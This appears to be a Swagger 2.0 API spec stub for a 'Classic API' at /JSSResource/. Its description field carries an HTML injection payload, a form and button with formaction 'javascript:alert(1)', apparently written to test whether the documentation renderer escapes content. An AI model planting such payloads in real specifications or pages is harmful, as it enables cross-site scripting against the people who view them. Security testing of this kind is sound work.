swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    aaa</div></div></div><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
